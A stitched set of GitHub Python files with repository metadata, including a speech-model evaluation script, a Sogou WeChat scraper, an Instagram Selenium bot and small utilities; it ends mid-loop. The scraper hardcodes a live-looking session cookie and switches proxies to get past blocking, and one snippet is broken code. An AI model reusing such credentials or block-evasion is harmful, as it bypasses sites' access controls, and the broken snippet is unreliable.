for i in range(0, set_size):
test_file, test_ground_truth = (
audio_processor.get_wav_files(1, i, model_settings, 'testing'))
test_data=wav2Input(test_file[0], model_settings)
test_accuracy, conf_matrix = sess.run(
[evaluation_step, confusion_matrix],
feed_dict={
'wav_data:0': test_data,
ground_truth_input: test_ground_truth,
})
total_accuracy += (test_accuracy) / set_size
if total_conf_matrix is None:
total_conf_matrix = conf_matrix
else:
total_conf_matrix += conf_matrix
tf.logging.info('Confusion Matrix:\n %s' % (total_conf_matrix))
tf.logging.info('Test accuracy = %.2f%% (N=%d)' % (total_accuracy * 100,
set_size))
def main(_):
# Create the model, load weights from pb and run on train/val/test
run_inference_pb(FLAGS.wanted_words, FLAGS.sample_rate,
FLAGS.clip_duration_ms, FLAGS.window_size_ms,
FLAGS.window_stride_ms, FLAGS.dct_coefficient_count,
FLAGS.model_architecture, FLAGS.model_size_info)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
'--data_url',
type=str,
# pylint: disable=line-too-long
default='http://download.tensorflow.org/data/speech_commands_v0.02.tar.gz',
# pylint: enable=line-too-long
help='Location of speech training data archive on the web.')
parser.add_argument(
'--data_dir',
type=str,
default='/tmp/speech_dataset/',
help="""\
Where to download the speech training data to.
""")
parser.add_argument(
'--graph', type=str, default='', help='Model to use for identification.')
parser.add_argument(
'--silence_percentage',
type=float,
default=10.0,
help="""\
How much of the training data should be silence.
""")
parser.add_argument(
'--unknown_percentage',
type=float,
default=10.0,
help="""\
How much of the training data should be unknown words.
""")
parser.add_argument(
'--testing_percentage',
type=int,
default=10,
help='What percentage of wavs to use as a test set.')
parser.add_argument(
'--validation_percentage',
type=int,
default=10,
help='What percentage of wavs to use as a validation set.')
parser.add_argument(
'--sample_rate',
type=int,
default=16000,
help='Expected sample rate of the wavs',)
parser.add_argument(
'--clip_duration_ms',
type=int,
default=1000,
help='Expected duration in milliseconds of the wavs',)
parser.add_argument(
'--window_size_ms',
type=float,
default=30.0,
help='How long each spectrogram timeslice is',)
parser.add_argument(
'--window_stride_ms',
type=float,
default=10.0,
help='How long each spectrogram timeslice is',)
parser.add_argument(
'--dct_coefficient_count',
type=int,
default=40,
help='How many bins to use for the MFCC fingerprint',)
parser.add_argument(
'--batch_size',
type=int,
default=100,
help='How many items to train with at once',)
parser.add_argument(
'--wanted_words',
type=str,
default='yes,no,up,down,left,right,on,off,stop,go',
help='Words to use (others will be added to an unknown label)',)
parser.add_argument(
'--model_architecture',
type=str,
default='dnn',
help='What model architecture to use')
parser.add_argument(
'--model_size_info',
type=int,
nargs="+",
default=[128,128,128],
help='Model dimensions - different for various models')
parser.add_argument(
'--training',
action='store_true',
default=False,
help='run on training (1) or not (0)',)
FLAGS, unparsed = parser.parse_known_args()
tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)
| [
"[email protected]"
] | |
e8f3976e2b6dcc07cb4fe0b885c28f90cd4437d2 | 27df5a1e656803be5e9330283dd0d45d53c3d33c | /python/lovetriangle.py | 672169c91c90d648944d462a1911bed796bb8e3d | [] | no_license | Gowtham-M1729/HackerearthPrograms | 6588e46c72604a169d7303d74d47850a41153608 | 7ea8131c5fa1e13cf0afe5248305246a6b26793e | refs/heads/master | 2023-07-11T08:24:21.303599 | 2021-08-16T18:07:44 | 2021-08-16T18:07:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 187 | py | def sol(k)
if(k<9):
return k;
else:
return k%9+10*fun(k//9)
while True:
try:
i =int(input())
print(sol(i))
except EOFError:
break
| [
"gowtham1842001.com"
] | gowtham1842001.com |
5c7ce685f81772301dbea7562573aa722012d178 | 5d07b568f7237343a4d2eea946474829f5797d0f | /spider.py | 46ea117a0f474328351de31a321baa2f6640ef31 | [] | no_license | LiHedog/crawls-sougou-s-wechat-article | eff526837a1bca126558bf464acc2536dc2af35f | a692e876aee33bc5f052b159f9c5cb432e4dcc04 | refs/heads/master | 2020-04-28T03:53:02.745382 | 2019-03-11T08:26:04 | 2019-03-11T08:26:04 | 174,955,450 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,035 | py | from urllib.parse import urlencode
import requests
from requests.exceptions import ConnectionError
from pyquery import PyQuery as pq
import pymongo
client = pymongo.MongoClient('localhost')
db = client['weixin']
base_url = 'https://weixin.sogou.com/weixin?'
headers = {
'Cookie': 'SUV=1545909958456327; SMYUV=1545909958457919; UM_distinctid=167ef69fb3035b-044183a787f426-b781636-1fa400-167ef69fb31346; _ga=GA1.2.1338857850.1546843672; CXID=D6C79E5AB5C9C7D9BB390F3FFF05A8A8; SUID=6F845F704C238B0A5C655E67000DF4F1; ad=Tyllllllll2tBqiXlllllVeOgf7llllltVM9bZllllylllllROxlw@@@@@@@@@@@; IPLOC=CN4403; cd=1550728372&138422711c1aa405e872165f18c55c82; rd=olllllllll2tb0hHgpcDHVem53Ctb0h1LPJBbZllll9llllxVylll5@@@@@@@@@@; ld=0yllllllll2tb0hHgpcDHVei27Ctb0h1LPJBbZllll9llllllylll5@@@@@@@@@@; LSTMV=259%2C213; LCLKINT=2175; ABTEST=8|1551766043|v1; weixinIndexVisited=1; sct=1; JSESSIONID=aaayESATQzgHc9WnlyZKw; ppinf=5|1551766259|1552975859|dHJ1c3Q6MToxfGNsaWVudGlkOjQ6MjAxN3x1bmlxbmFtZToyMDpEUiVFOCU5MyU5RCVFNyU5MyU5Q3xjcnQ6MTA6MTU1MTc2NjI1OXxyZWZuaWNrOjIwOkRSJUU4JTkzJTlEJUU3JTkzJTlDfHVzZXJpZDo0NDpvOXQybHVPQU1KUUxVYjREanQxcG43LXhraGpVQHdlaXhpbi5zb2h1LmNvbXw; pprdig=acd4Pnfzn8nxX0PafcW8OjwZh3qDbOD7yAmSRBIWxi451i_LPAeZ1WxBdnSnDJVThSeqDfhlmQ16fU8FLweWjcGPZQhltJQJkGF0rmZGZoqVoKmxyY0ptdSPkEaMZAbCc5zrpZuu0IKHD57L8u5GSiAyWJ-0KiwhflCSczoJ0r8; sgid=06-37472631-AVxibEvOmRDkcQC32cmxFVicM; ppmdig=1551766260000000e140a563eaa123145908f5b82ed4a3a9; PHPSESSID=lts8eof02o4efm62gvj4679i81; SNUID=F7C18A43989D1ACA59EF2B8A990A12B0; seccodeRight=success; successCount=1|Tue, 05 Mar 2019 06:17:21 GMT',
'Host': 'weixin.sogou.com',
'Referer': 'https://weixin.sogou.com/weixin?query=%E9%A3%8E%E6%99%AF&_sug_type_=&sut=5079&lkt=7%2C1551766084967%2C1551766090031&s_from=input&_sug_=y&type=2&sst0=1551766090134&page=99&ie=utf8',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36'
}
keyword = '风景'
proxy_pool_url = 'http://127.0.0.1:5000/get'
proxy = None
max_count = 10000000
def get_proxy():
try:
response = requests.get(proxy_pool_url)
if response.status_code == 200:
return response.text
return None
except ConnectionError:
return None
def get_html(url, count=1):
print('Crawking', url)
print('Trying Count', count)
global proxy
if count >= max_count:
print('Tried Too Mang Counts')
return None
try:
if proxy:
proxies = {
'http': 'http://' + proxy
}
response = requests.get(url, allow_redirects=False, headers=headers, proxies = proxies)
else:
response = requests.get(url, allow_redirects=False, headers=headers)
if response.status_code == 200:
return response.text
if response.status_code == 302:
print(302)
proxy = get_proxy()
if proxy:
print('Using Proxy', proxy)
return get_html(url)
else:
print('Get Proxy Failed')
return None
except ConnectionError as e:
print('Error Occurred', e.args)
proxy = get_proxy()
count += 1
return get_html(url, count)
def get_index(keyword, page):
data = {
'query': keyword,
'type': 2,
'page': page
}
queries = urlencode(data)
url = base_url + queries
html = get_html(url)
return html
def parse_index(html):
doc = pq(html)
items = doc('.news-box .news-list li .txt-box h3 a').items()
for item in items:
yield item.attr('href')
def get_dedail(url):
try:
response = requests.get(url)
if response.status_code == 200:
return response.text
return None
except ConnectionError:
return None
def parse_detail(html):
doc = pq(html)
title = doc('.rich_media_title').text()
content = doc('.rich_media_content ').text()
date = doc('#publish-time').text()
nickname = doc('#js_profile_qrcode > div > strong').text()
wechat = doc('#js_profile_qrcode > div > p:nth-child(3) > span').text()
return {
'title': title,
'content': content,
'data': date,
'nickname': nickname,
'wechat': wechat
}
def save_to_mongo(data):
if db['articles'].update({'title': data['title']}, {'$set': data}, True):
print('Save to Mongo', data['title'])
else:
print('Save to Mongo Faild', data['title'])
def main():
for page in range(1, 100):
html = get_index(keyword, page)
if html:
article_urls = parse_index(html)
for article_url in article_urls:
article_html = get_dedail(article_url)
if article_html:
article_data = parse_detail(article_html)
print(article_data)
save_to_mongo(article_data)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
04d18211b9700e6ac030a2709df3e0b16d47d74a | e1c36cb4ceb7edd7e6780b96e148ab7e2d0d140c | /.venv/bin/black | d7f4a080fee4d4a5dee07405382efe8e12c097bc | [] | no_license | dengyijia/chicago | e0c89ad9efaa32bfa019fafef5efbbfcb08c10d9 | 4a8f74ca7348db94392f780114b8c6f8b6d24920 | refs/heads/master | 2022-12-15T15:50:39.134209 | 2020-09-10T00:18:03 | 2020-09-10T00:18:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 385 | #!/Users/nasr.maswood/code/chicago/.venv/bin/python3
# EASY-INSTALL-ENTRY-SCRIPT: 'black','console_scripts','black'
__requires__ = 'black'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('black', 'console_scripts', 'black')()
)
| [
"[email protected]"
] | ||
e4a8b6985f4178e773dbf0b1bbf7f2a5edaf1dd7 | 13391bb116ca5e4dcee49c58029857c1c419e5fb | /goc_client/v1/client.py | 1a4ca066184baaf6644caa84a9a88dfdd8849c46 | [] | no_license | Nigo-Liu/Python | cb501ed606f9019ec01ca646fdd2cdc07f3c2ee1 | 56fb0732ca468aa792cbd060e40fedbadbc5a649 | refs/heads/master | 2021-06-26T19:30:40.210429 | 2020-10-13T07:11:11 | 2020-10-13T07:11:11 | 154,466,751 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,814 | py | # coding=UTF-8
from gocloud.client.v1 import logs, categories, solutions, images, servers
from gocloud.client.v1 import groups, volumes, users
from gocloud.client.v1 import sites
from gocloud.client.v1 import snapshots
from gocloud.client.v1 import networks
from gocloud.client.v1 import lbs
from gocloud.client.v1 import repositories
from gocloud.client.v1 import security_groups
from gocloud.client.v1 import infra
from gocloud.client.v1 import version
from gocloud.client.v1 import availability_zones
from gocloud.client.v1 import keypairs
from gocloud.client.v1 import notifications
from gocloud.client.v1 import flavors
class Client():
def __init__(self, request, ip):
self.users = users.Users(request, ip)
self.logs = logs.Logs(request, ip)
self.categories = categories.Categories(request, ip)
self.solutions = solutions.Solutions(request, ip)
self.images = images.Images(request, ip)
self.servers = servers.Servers(request, ip)
self.groups = groups.Groups(request, ip)
self.volumes = volumes.Volumes(request, ip)
self.sites = sites.Sites(request, ip)
self.snapshots = snapshots.Snapshots(request, ip)
self.networks = networks.Networks(request, ip)
self.lbs = lbs.LoadBalancers(request, ip)
self.flavors = flavors.Flavors(request, ip)
self.security_groups = security_groups.Security_groups(request, ip)
self.repositories = repositories.Repositories(request, ip)
self.infra = infra.Infra(request, ip)
self.version = version.Version(request, ip)
self.availability_zones =\
availability_zones.AvailabilityZones(request, ip)
self.keypairs = keypairs.Keypairs(request, ip)
self.notifications = notifications.Notifications(request, ip)
| [
"[email protected]"
] | |
012a97e548d3dc1165108940cd9f55b4cebb3037 | 2ad5bcf1c03cd6e20a85bd3b1d7a01cca8767bdc | /Device_Library/device_query.py | 5e7a427227f5e64954eae52df582bdcda05a735d | [] | no_license | koarakawaii/Device_Library | a8285e36a1354dfb439d3b3bf1fc98964d05f236 | d3ce870834747801e640232b5827b44a08e43f8e | refs/heads/master | 2023-01-24T13:06:41.707745 | 2020-11-18T20:07:31 | 2020-11-18T20:07:31 | 283,691,207 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 157 | py | #!/usr/bin/env python
# coding: utf-8
import pyvisa as visa
def GPIB_QUERY():
rm = visa.ResourceManager()
print(rm.list_resources())
return rm
| [
"[email protected]"
] | |
cde4e5f1879a219342123c077b672b7d4ac43dc2 | ab5b1cdd69920a9bb6333082c45cf4a88f521fa5 | /part1.py | 45f89685bb941ce7089c9e743cdc0fb9ddef4d37 | [] | no_license | mgillespie19/machine_learning_attackLab | e87e2822cdeed7be173235656264188f23725caf | 0c564bb6511880e6c5dc839126c184634f3f9ad5 | refs/heads/master | 2020-05-04T22:04:51.809507 | 2019-04-04T14:24:11 | 2019-04-04T14:24:11 | 179,498,754 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 982 | py | #ignore complex numbers going into the matrix
import sklearn
from sklearn import preprocessing
from sklearn.ensemble import RandomForestRegressor
import numpy as np
import csv
f = open("Lab8_feature_data.csv")
f.readline()
data = [row for row in csv.reader(f)]
for i in range(0, len(data)):
for j in range(0, len(data[i])):
data[i][j] = data[i][j].replace('(','').replace(')','')
data[i][j] = np.complex(data[i][j]).real
data = preprocessing.scale(data)
x = np.delete(data, np.s_[71:73], axis=1)
y = np.delete(data, np.s_[0:73], axis=1)
x_test = x[23552:29539]
x_train = x[0:23552]
y_test = y[23552:29539]
y_train = y[0:23552]
print(y_test)
# linreg = RandomForestRegressor(oob_score=True)
#
# linreg.fit(x_train, y_train)
# y_pred = linreg.predict(x_test)
# print(y_pred)
# PROOF Y IS WORKING
# for key in y:
# print(key[0])
# PROOF X IS WORKING
# for row in x:
# print("---------NEW ROW--------")
# for cell in row:
# print(cell)
| [
"[email protected]"
] | |
69bc3d840fa879e2cb72dd93b872aef1558f5ca7 | 5db3009eb36afe7110ed5402be3a9e570c58c540 | /my_plugins/YouCompleteMe/third_party/ycmd/ycmd/completers/python/hook.py | 875d081eac70987e439d832a1fbf917bbf0c8689 | [
"GPL-3.0-only",
"GPL-1.0-or-later",
"MIT"
] | permissive | imfangli/vimrc | ced2c6caece1cf19421c6ea7deb017bec4ca3a27 | d2d14e7d083d70cc8627ddccb5b99c53c3c38be3 | refs/heads/master | 2022-02-01T00:34:31.855421 | 2022-01-22T15:57:28 | 2022-01-22T15:57:28 | 211,766,038 | 2 | 0 | MIT | 2019-09-30T03:15:03 | 2019-09-30T03:15:02 | null | UTF-8 | Python | false | false | 1,106 | py | # Copyright (C) 2011, 2012 Stephen Sugden <[email protected]>
#
# This file is part of ycmd.
#
# ycmd is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ycmd is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ycmd. If not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
# Not installing aliases from python-future; it's unreliable and slow.
from builtins import * # noqa
from ycmd.completers.python.python_completer import PythonCompleter
def GetCompleter( user_options ):
return PythonCompleter( user_options )
| [
"[email protected]"
] | |
996c6280c55b81f5acba29c1857b5b484ee57cec | eb60abe836cb21276c3b41fb8584a5c2f707fd8f | /module1-introduction-to-sql/buddymove_holidayiq.py | acacb1b0d431b7f920d6f8620e69abda42885b0d | [
"MIT"
] | permissive | ToddMG/DS-Unit-3-Sprint-2-SQL-and-Databases | edc55be7ee60072ae3b06eb7977a755f1402a965 | 7e226039d14e7771d2b6c0b8336b1bc19d9121db | refs/heads/master | 2020-08-08T06:44:10.694545 | 2019-11-07T20:11:03 | 2019-11-07T20:11:03 | 213,762,739 | 0 | 0 | MIT | 2019-10-08T21:53:59 | 2019-10-08T21:53:59 | null | UTF-8 | Python | false | false | 1,070 | py | import sqlite3
import pandas as pd
df = pd.read_csv('buddymove_holidayiq.csv')
print(df)
conn = sqlite3.connect('buddymove_holidayiq.sqlite3')
df.to_sql('review', con=conn)
q1 = conn.execute('SELECT COUNT(*) FROM review').fetchone()
q2 = conn.execute('SELECT COUNT(*) FROM review WHERE Nature >= 100 AND Shopping >= 100').fetchall()
sports_avg = conn.execute('SELECT AVG(Sports) FROM review;').fetchone()
rel_avg = conn.execute('SELECT AVG(Religious) FROM review;').fetchone()
nat_avg = conn.execute('SELECT AVG(Nature) FROM review;').fetchone()
tht_avg = conn.execute('SELECT AVG(Theatre) FROM review;').fetchone()
shp_avg = conn.execute('SELECT AVG(Shopping) FROM review;').fetchone()
pic_avg = conn.execute('SELECT AVG(Picnic) FROM review;').fetchone()
q3 = {'Sports average':sports_avg, 'Religious Average':rel_avg, 'Nature Average':nat_avg,
'Theatre Average':tht_avg, 'Shopping Average': shp_avg, 'Picnic Average':pic_avg}
print('Total number of rows:', q1)
print('Users who reviewed at least 100 in Nature and Shopping:', q2)
print(q3)
conn.close()
| [
"[email protected]"
] | |
0a0656216cb0cf8cdfd429c62ce6abd151e9fb21 | 49945f5630ed074922876836d5af9f6faf71d085 | /assessing.py | 04b93c25eadd2d9334596713ed33d3cb1957ddb6 | [
"MIT"
] | permissive | nealchenzhang/TAAlgo | 492881abd38845ae018d589b60325ee3171c7e95 | 92159efcc5d657a9caf79a026491e1decf406b06 | refs/heads/master | 2020-04-16T22:43:00.492209 | 2019-05-21T15:19:20 | 2019-05-21T15:19:20 | 165,980,496 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 6,697 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Feb 12 15:41:25 2019
@author: chen zhang
"""
import numpy as np
import pandas as pd
from scipy import stats
# Holding Periods
# Price target
# Predefined time limit
# Stop loss
# Passive or fixed time periods
# Assessing the Performance of Trading Signals
def pair_test(ys, signal, hp=5, rtn_type='log'):
"""
:param ys: original data Series
:param signal: signal Series generated with time index
:param hp: predefined fixed holding periods
:param rtn_type: definition of return types
'log': logarithmic returns
'mean': arithmetic returns
:return: h
"""
ls_ix_signal = signal.index.tolist()
ls_ix_signal_nan = [i for i in ls_ix_signal if i not in signal.dropna().index.tolist()]
rtn = (ys.shift(hp) / ys).apply(np.log)
rtn.loc[ls_ix_signal_nan] = np.nan
rtn_signal = rtn.copy()
rtn_signal.loc[signal.where(signal == 0).dropna().index.tolist()] = np.nan
rtn_signal.loc[signal.where(signal == 1).dropna().index.tolist()] *= 1
rtn_signal.loc[signal.where(signal == -1).dropna().index.tolist()] *= -1
rtn_signal.loc[ls_ix_signal_nan] = np.nan
rtn_signal.dropna(inplace=True)
rtn.dropna(inplace=True)
print('Null Hypothesis: rtn_signal = rtn')
print('Alternative Hypothesis: rtn_signal > rtn')
mean_signal, mean_market = rtn_signal.mean(), rtn.mean()
std_signal, std_market = rtn_signal.std(ddof=1), rtn.std(ddof=1)
n_signal, n_market = rtn_signal.size, rtn.size
df = n_signal + n_market - 2
sed = np.sqrt(((n_signal-1)*std_signal**2 + (n_market-1)*std_market**2)/df)
t_stat = (mean_signal - mean_market) / (sed * np.sqrt(1/n_signal + 1/n_market))
# Critical t-value: one-tailed
one_tailed_alpha = [0.1, 0.05, 0.01]
print('-' * 40)
print('Calculated t_stats is {}.\nWith df = {}'.format(t_stat, df))
for alpha in one_tailed_alpha:
c_t = stats.t.ppf(1 - alpha, df=df)
if t_stat > c_t:
print('Reject the null hypothesis at the {:.2%} level of significance'.format(alpha))
print('Good to go with fixed {} holding period'.format(hp))
else:
print('We failed to reject the null hypothesis at the {:.2%} level of significance'.format(alpha))
return hp
def Bernoulli_trials(x, N, p=0.5):
"""
p: probability of success: 50%
N: number of trials (different assets)
x: number of successful cases
(where trading rule generates positive profits)
"""
# mean: p*N
# sigma: (N*p*(1-p))**(1/2)
z_stat = (x-p*N) / (N*p*(1-p))**(1/2)
print('Null Hypothesis: x = p*N')
print('Alternative Hypothesis: x < p*N')
# Critical z-value: one-tailed
one_tailed_alpha = [0.1, 0.05, 0.01]
print('-' * 40)
print('Calculated z_stats is {}.'.format(z_stat))
for alpha in one_tailed_alpha:
c_t = stats.norm.ppf(1 - alpha)
if z_stat > c_t:
print('Reject the null hypothesis at the {:.2%} level of significance'.format(alpha))
print('Good to go with the strategy.')
else:
print('We failed to reject the null hypothesis at the {:.2%} level of significance'.format(alpha))
pval = stats.norm.sf(z_stat)
return pval
def Bootstrap_Approach(ys):
# TODO: check the normality of rtn
log_return = (ys / ys.shift(1)).apply(np.log)
mean = log_return.mean()
std_dev = log_return.std()
###########################################################################
# Calculate sample bias-corrected skewness
N = log_return.size
g1 = (((log_return - mean) ** 3).sum() / N) / (((((log_return - mean) ** 2).sum()) / N) ** (3 / 2))
G1 = (N * (N - 1)) ** 0.5 * g1 / (N - 2)
# Significance test of skewness
SES = (6*N*(N-1) / ((N-2)*(N+1)*(N+3)))**0.5
# H0: G1 = 0
# H1: G1 != 0
ZG1 = G1 / SES
print('Null Hypothesis: G1 = 0')
print('Alternative Hypothesis: G1 != 0')
# Critical z-value: two-tailed
two_tailed_alpha = [0.05, 0.01]
print('-' * 40)
print('Calculated z_stats is {}.'.format(ZG1))
for alpha in two_tailed_alpha:
c_t = stats.norm.ppf(1 - alpha / 2)
if ZG1 > c_t:
print('Reject the null hypothesis at the {:.2%} level of significance'.format(alpha))
else:
print('We failed to reject the null hypothesis at the {:.2%} level of significance'.format(alpha))
G1_p = stats.norm.sf(ZG1)
# Calculate sample bias-corrected kurtosis
N = log_return.size
g2 = (((log_return - mean) ** 4).sum() / N) / (((((log_return - mean) ** 2).sum()) / N) ** 2)
G2 = (N - 1)/((N-2)*(N-3)) *((N+1)*g2-3*(N-1))+3
# Significance test of kurtosis
SEK = 2*SES*((N**2-1)/((N-3)*(N+5)))**0.5
# H0: G2 = 3
# H1: G2 != 3
ZG2 = (G2-3) / SEK
print('Null Hypothesis: G2 = 3')
print('Alternative Hypothesis: G2 != 3')
# Critical z-value: two-tailed
two_tailed_alpha = [0.05, 0.01]
print('-' * 40)
print('Calculated z_stats is {}.'.format(ZG2))
for alpha in two_tailed_alpha:
c_t = stats.norm.ppf(1 - alpha / 2)
if ZG2 > c_t:
print('Reject the null hypothesis at the {:.2%} level of significance'.format(alpha))
else:
print('We failed to reject the null hypothesis at the {:.2%} level of significance'.format(alpha))
G2_p = stats.norm.sf(ZG2)
###########################################################################
G1 = stats.skew(log_return.dropna())
(ZG1, G1_p) = stats.skewtest(log_return.dropna())
G2 = stats.kurtosis(log_return.dropna())
(ZG2, G2_p) = stats.kurtosistest(log_return.dropna())
(ZKS, KS_p) = stats.kstest(log_return.dropna(), 'norm')
dict_stats = {
'Mean': mean,
'Std': std_dev,
'Skewness': {
'value': G1,
'p_value': G1_p
},
'Kurtosis': {
'value': G2,
'p_value': G2_p
},
'KS_stat': {
'value': ZKS,
'p_value': KS_p
}
}
return dict_stats
# Assessing the Performance of Predicting Returns
if __name__ == '__main__':
df_ys = pd.read_csv('./Data/ru_i_15min.csv')
# df_ys = pd.read_csv('./Data/IF1903_1min.csv')
df_ys.datetime = df_ys.datetime.apply(pd.to_datetime)
df_ys.datetime = df_ys.datetime.apply(lambda x: str(x))
df_ys.set_index('datetime', inplace=True)
ls_cols = df_ys.columns.tolist()
str_Close = [i for i in ls_cols if i[-6:] == '.close'][0]
ys = df_ys.loc[:, str_Close]
ys = ys[-300:]
| [
"[email protected]"
] | |
8f375307e59ae9ff7ea9e2e6b1ef4ab6b09bd545 | 1d5ee66a920a218f2816fbb1f501e4f2f3f88948 | /class_vis.py | 3d48696ea23458d55eda97e93f84d193ee8182cf | [] | no_license | weschurch/ud120 | 5ba3852c1a8bd1e61f6578f0433fc97311bfeeb2 | 67a15e2d8315a33eb79bfcb9464b01b41bc5af3a | refs/heads/master | 2021-06-11T12:23:29.405751 | 2017-02-06T03:14:01 | 2017-02-06T03:14:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,800 | py | #!/usr/bin/python
#from udacityplots import *
import warnings
warnings.filterwarnings("ignore")
import matplotlib
matplotlib.use('agg')
import matplotlib.pyplot as plt
import pylab as pl
import numpy as np
#import numpy as np
#import matplotlib.pyplot as plt
#plt.ioff()
def prettyPicture(clf, X_test, y_test):
x_min = 0.0; x_max = 1.0
y_min = 0.0; y_max = 1.0
# Plot the decision boundary. For that, we will assign a color to each
# point in the mesh [x_min, m_max]x[y_min, y_max].
h = .01 # step size in the mesh
xx, yy = np.meshgrid(np.arange(x_min, x_max, h), np.arange(y_min, y_max, h))
Z = clf.predict(np.c_[xx.ravel(), yy.ravel()])
# Put the result into a color plot
Z = Z.reshape(xx.shape)
plt.xlim(xx.min(), xx.max())
plt.ylim(yy.min(), yy.max())
plt.pcolormesh(xx, yy, Z, cmap=pl.cm.seismic)
# Plot also the test points
grade_sig = [X_test[ii][0] for ii in range(0, len(X_test)) if y_test[ii]==0]
bumpy_sig = [X_test[ii][1] for ii in range(0, len(X_test)) if y_test[ii]==0]
grade_bkg = [X_test[ii][0] for ii in range(0, len(X_test)) if y_test[ii]==1]
bumpy_bkg = [X_test[ii][1] for ii in range(0, len(X_test)) if y_test[ii]==1]
plt.scatter(grade_sig, bumpy_sig, color = "b", label="fast")
plt.scatter(grade_bkg, bumpy_bkg, color = "r", label="slow")
plt.legend()
plt.xlabel("bumpiness")
plt.ylabel("grade")
plt.savefig("result.png")
import base64
import json
import subprocess
def output_image(name, format, bytes):
image_start = "BEGIN_IMAGE_f9825uweof8jw9fj4r8"
image_end = "END_IMAGE_0238jfw08fjsiufhw8frs"
data = {}
data['name'] = name
data['format'] = format
data['bytes'] = base64.encodestring(bytes)
print image_start+json.dumps(data)+image_end | [
"[email protected]"
] | |
efa07210ff6f08245e4804bed6abdae003e850bc | 912ab3a9f3d44a025e48ef2e01af968e980e15a8 | /main.py | 6f116d84b453d0eb80c0b769fb4d370264fd8ff5 | [] | no_license | asutd/youtubecomments | c9b36852baa0c7f04413c53da0a503038812cb40 | ff6813801d7146ef6da454f948783d3b8f6079ae | refs/heads/master | 2022-07-27T17:02:41.769654 | 2020-05-16T22:55:07 | 2020-05-16T22:55:07 | 258,897,598 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,286 | py | #main.py
from selenium import webdriver
from time import sleep
from secrets import pw
from secrets import login
class InstaBot:
def __init__(self, username, pw):
print("init")
self.username = username
self.driver = webdriver.Chrome()
self.driver.get("https://www.instagram.com/accounts/login/")
sleep(1.618)
self.driver.find_element_by_xpath("//input[@name=\"username\"]")\
.send_keys(username)
sleep(1.618)
self.driver.find_element_by_xpath("//input[@name=\"password\"]")\
.send_keys(pw)
sleep(1.618)
self.driver.find_element_by_xpath('//button[@type="submit"]')\
.click()
sleep(3)
self.driver.find_element_by_xpath("//button[contains(text(), 'Not Now')]")\
.click()
sleep(2)
def getUnfollowers(self):
print("starting getUnfollowers")
self.driver.find_element_by_xpath("//a[contains(@href,'/{}')]".format(self.username))\
.click()
sleep(2)
self.driver.find_element_by_xpath("//a[contains(@href,'/following')]")\
.click()
sleep(2)
sugs = self.driver.find_element_by_xpath('//h4[contains(text(), $sugges')
bot = InstaBot(login, pw)
bot.getUnfollowers()
| [
"[email protected]"
] | |
87104cbaa2ce1c05efb37c6933faa6a5e6390573 | bb62f7d2043e22721a9abaaf9424d6fbb87862f2 | /storage/fase2/team02/storage/DictMode/modulo_bd.py | c861be063e2be773bda689a4bed44ac0b015175f | [
"MIT"
] | permissive | sandymerida/tytus | 7499fb306321f7563b773a8c6dda2cb5e46bb819 | a26c9a0ad55a36c7579dfd8f457eeff8b1a39186 | refs/heads/main | 2023-02-17T15:02:55.143120 | 2021-01-09T20:22:55 | 2021-01-09T20:22:55 | 320,125,119 | 1 | 0 | MIT | 2020-12-10T01:28:12 | 2020-12-10T01:28:11 | null | UTF-8 | Python | false | false | 912 | py | # License: Released under MIT License
# Notice: Copyright (c) 2020 TytusDB Team
# Developer: Andree Avalos
from storage.DictMode.singleton import existDB, insertDB, alterDB, dropDB, showDB, dropAll
def createDatabase(database: str):
try:
if existDB(database):
return 2
return insertDB(database)
except:
return 1
def alterDatabase(databaseOld, databaseNew):
try:
if not existDB(databaseOld):
return 2
if existDB(databaseNew):
return 3
return alterDB(databaseOld, databaseNew)
except:
return 1
def dropDatabase(database:str):
try:
if not existDB(database):
return 2
return dropDB(database)
except:
return 1
def showDatabases():
try:
return showDB()
except:
return 1
| [
"[email protected]"
] | |
b7d4bf416177c3cf97113ed4ad53ad3f3c2941a0 | beb638f3422f9465a7fd1d2e95958a9f87f09995 | /offline1/1505071.py | a9c8176af5243cfe0031f60dbd0fec470aaa0875 | [] | no_license | Mritunjoy71/CSE_474-Pattern-Recognition-Sessional | 8604e1e84f4c8279a2fa2c7d093313895c5a36d1 | b3d62abb7b4093b05ead7c82ace6f724b1a0654b | refs/heads/master | 2023-02-19T20:44:40.079396 | 2021-01-21T21:23:46 | 2021-01-21T21:23:46 | 331,758,434 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,365 | py | import numpy as np
input_file = open("trainLinearlySeparable.txt")
input_lines = input_file.readlines()
d_feature = 0
m_class = 0
n_samples = 0
train_LS = []
line_count = 0
for line in input_lines:
if line_count == 0:
L = line.split()
d_feature = int(L[0])
m_class = int(L[1])
n_samples = int(L[2])
#print(L)
else:
L = line.split()
line_data = []
for i in range(d_feature):
line_data.append(float(L[i]))
line_data.append(int(L[d_feature]))
#print(line_data)
train_LS.append(line_data)
line_count = line_count + 1
input_file = open("testLinearlySeparable.txt")
input_lines = input_file.readlines()
test_LS = []
line_count = 0
for line in input_lines:
